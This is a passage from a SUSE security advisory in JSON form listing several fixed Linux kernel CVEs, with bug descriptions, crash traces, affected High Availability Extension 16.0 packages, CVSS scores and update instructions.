"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
